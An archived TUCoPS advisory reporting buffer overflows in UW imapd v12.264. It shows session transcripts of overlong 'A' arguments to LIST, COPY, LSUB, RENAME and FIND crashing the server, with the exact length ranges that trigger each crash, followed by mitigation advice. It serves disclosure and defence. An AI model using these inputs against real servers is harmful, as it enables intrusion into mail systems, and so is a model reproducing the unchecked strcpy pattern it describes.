TUCoPS :: Unix :: General :: imapd9-1.htm

TUCoPS :: Unix :: General :: imapd9-1.htm
Imapd root exploit
Vulnerability
 imapd
Affected
 imapd4r1 v12.264 (imap-4.7 package from the UW)
Description
 Michal Zalewski found following. Newest RH:
 OK nimue IMAP4rev1 v12.264 server ready
 1 login lcamtuf test
 1 OK LOGIN completed
 1 list "" AAAAAAAAAAAAAAAAAAAAAAAAAAA...[yes, a lot of 'A's ;]
 Program received signal SIGSEGV, Segmentation fault.
 0x41414141 in ?? ()
 Privledges seems to be dropped, but, anyway, it's nice way to get
 shell access to mail account, maybe grab some data from memory
 etc. It is believed both imap and ipopd packages need code
 security audit.
 To segfault the number of A's has to in the range 1023 < #A>
 8180. If the command line including CR/LF is longer than 8192 an
 error message is displayed. The segfaults are in the nntp, mh,
 news and dummy driver. In all modules the subroutine
 <name>_canonicalize will happily strcpy and strcat the user
 supplied arguments to fixed size buffers with normally
 MAILTMPLEN = 1024 bytes. Older version, imap-4.5-4 seems to be ok.
 Here's another buffer overflow in imapd. This time security flaw
 exist in standard rfc 1064 COPY command:
 OK mail IMAP4rev1 v12.264 server ready
 login siva9 secret
 OK LOGIN completed
 select inbox
 2 EXISTS
 0 RECENT
 OK [UIDVALIDITY 956162550] UID validity status
 OK [UIDNEXT 5] Predicted next UID
 FLAGS (\Answered \Flagged \Deleted \Draft \Seen)
 OK [PERMANENTFLAGS (\* \Answered \Flagged \Deleted \Draft \Seen)] Permanent
 flags
 OK [UNSEEN 2] first unseen message in /var/spool/mail/siva9
 OK [READ-WRITE] SELECT completed
 copy 1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... [a lot of A's]
 No answer. Process has been killed by SIGSEGV. Number of A's
 must be in range from 1017 to 8180. After LOGIN all privileges
 are dropped, but we still have possibility to get unprivileged
 shell access. This was tested against WU imapd v10.223, v11.241,
 v12.250, v12.261, and v12.264.
 Here comes yet another buffer overrun (3 ones). This time
 affected commands are LSUB, RENAME and FIND:
 OK mail IMAP4rev1 v12.264 server ready
 login siva9 secret
 OK LOGIN completed
 lsub "" AAAAAAAAAAAAA.... (#A 1024 - 8179)
 SIGSEGV received.
 OK localhost IMAP4rev1 v12.264 server ready
 login siva9 secret
 OK LOGIN completed
 rename inbox AAAAAAAAAAAAA.... (#A 1021 - 8174)
 SIGSEGV received.
 OK localhost IMAP4rev1 v12.264 server ready
 login siva9 secret
 OK LOGIN completed
 find all.mailboxes AAAAAAAAAAAAA.... (#A 1026 - 8168)
 SIGSEGV received.
 It seems that all two-argument commands in authenticated state -
 where second argument is string - are vulnerable. ipop2/3d works
 fine in all states, also in transaction state.
Solution
 1) Deinstall the imap-uw port/package, if you you have installed
 it.
 2) If you do not specifically require imap functionality (i.e.
 pop2/pop3 is sufficient) then disable the imap daemon in
 /etc/inetd.conf and restart inetd (e.g. with the command
 'killall -HUP inetd')
 Unfortunately the vulnerabilities in imapd are quite extensive and
 no patch is currently available to address them. There is also
 no "drop-in" replacement for imap-uw currently available in
 ports, although the mail/cyrus port is another imap server which
 may be a suitable replacement. Cyrus has different configuration
 and operational requirements than imap-uw however, which may make
 it unsuitable for many users.
 Until a security audit of the imap-uw source can be completed and
 the vulnerabilities patched, it is recommended that operators of
 "closed" imapd servers take steps to minimize the impact of users
 being able to run code on the server (i.e., by tightening the
 local security on the machine to minimize the damage an intruding
 user can cause).